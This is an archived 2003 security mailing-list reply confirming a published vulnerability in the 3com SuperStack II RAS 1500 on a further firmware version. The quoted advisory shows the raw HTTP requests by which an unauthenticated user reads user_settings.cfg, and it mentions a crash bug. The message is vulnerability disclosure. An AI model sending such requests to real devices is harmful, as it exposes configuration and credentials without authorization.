|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
re:3com RAS 1500 Remote vulnerabilities.
From: Jan Kachlik (jkachlik
isgroup.com)
Date: Tue Apr 01 2003 - 07:11:03 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Hi Piotr Chytla
>Synopsis: 3com RAS 1500 Remote vulnerabilities.
>Product: 3C433279A-US http://www.3com/ras1500
>Version: Firmware X2.0.10
>
>URL: http://isec.pl/vulnerabilities/isec-0009-3com-ras.txt
>Author: Piotr Chytla <pchisec.pl>
>Date: February 27, 2003
>
>
I tested second bug on
SuperStack II Remote Access System 1500, Version: 2.5.0, 159,
and working...
>Issue:
>- ------
>
> 3com SuperStack II Remote Access System 1500 is telco device which
> provides access via BRI-ISDN/Analog to dialin users.
> It contains two remote vulnerabilities, first is Denial Of Service that
> leads to system crash, second can be used to read configuration files.
>
>2. Configuration file read
>
> Unauthorized user can read configuration and system files, using web
> interface on RAS 1500 .
>
> GET /download.htm HTTP/1.0
> HTTP/1.0 401 Unauthorized
> WWW-Authenticate: Basic realm="RAS1500"
> Content-Type: text/html
> Server: Allegro-Software-RomPager/2.10
>
> GET /user_settings.cfg HTTP/1.0
> HTTP/1.0 200 OK
> Content-Type: multipart
> Date: Mon, 25 May 1998 00:26:38 GMT
> Last-Modified: Tue, 01 Jan 1901 00:00:01 GMT
> Content-Length: 1258
> Server: Allegro-Software-RomPager/2.10
> [..]
content of user_setting.cfg
--
Best regards,
Jan Kachlik
jkachlikisgroup.com
+---------------------------------+
' Kachlik Jan '
' Security & Network Specialist '
' InterSource Solutions Group '
' Mathonova 25, 613 00 Brno CZ '
' Mail: jkachlikisgroup.com '
' Mail: jkachlikhacktrack.com '
' GSM: +420.728.662.807 '
' ICQ: #56618470 '
' WebSite: http://www.isgroup.com '
+---------------------------------+
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]